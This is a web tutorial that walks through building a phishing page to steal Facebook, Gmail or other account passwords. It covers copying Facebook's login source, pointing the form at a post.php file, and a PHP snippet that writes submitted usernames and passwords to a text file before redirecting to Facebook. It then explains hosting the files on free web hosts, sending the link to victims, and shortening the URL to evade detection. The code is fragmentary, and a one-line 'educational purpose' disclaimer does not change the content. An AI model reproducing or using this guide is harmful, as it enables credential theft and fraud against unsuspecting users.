Hack Facebook Using Phishing
Follow The Given Steps (by these you can also hack Gmail, Yahoo, or any other account)
Step 1
To hack facebook using phishing, first of all, go to the Facebook and
then right-click on the blank area, you will see the option view source
page simply click on that.
Step 2
Now a tab will open which will contain source code of Facebook login page.
Step 3
select all code and copy all code then paste it into notepad.
Step 4
When source code is pasted in notepad after that press
Ctrl+F and type
action in notepad.
Step 5
you will have to search again and again till you have found a text which looks like
Step 6
After that delete all the text written in green and instead of write it
Post.php. After that, it will look like action=”post.php”
Step 7. Save it on your desktop or in any hard drive
storage with the name index.htm and yes remember not as index.html as
many times people save it as index.html.
you have completely made your phishing page which will look like as given in the pic below
Step 8
Now you need to create a php file for this Open a new notepad and copy the code given below and save it with the name
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);
you have successfully created two files 1.
index.htm and 2.
Step 9
You need to upload these two files in a free web hosting site.
some best webhosting site which are useful for you. you need to make a
account on any of one below web hosting site.
- www.my3gb.com
- Hostinger
- www.000webhost.com
- Freehosting
I prefer www.000webhost.com
Step 10
Now you have to sign up simply fill all required information in the registration form.
When your account completely setup simply log in with your username and password.
Step 11
Open Cpanel (control panel) then click on file manager, after that a new window will pop up. Now go to public_html.
Step 12
Delete the file named default.php after that you need to upload
index.htm and
post.php file
click on upload files button and upload both files one by one. Now
click on index.htm which will look like same as that of the original
Facebook page. this is your phishing page.
Step 13. Copy URL of that page and send this link to
victim on Facebook , Gmail , or wherever you want, when victim open
that link he sees fake Facebook page which looks like real and enters
their username and password and hit log in his password, the page
redirects connect to facebook and you will able to see his/her password
by going into account 000webhost.com and go to file manager and then
public_html here you will find a new file as
username.txt. Before sending this link to anyone
shorten its URL first which may help you to undetected by Facebook. You have successfully hack Facebook using Phishing.
phishing is a criminal offense and illegal activity so don’t try to anyone. This tutorial is for educational purpose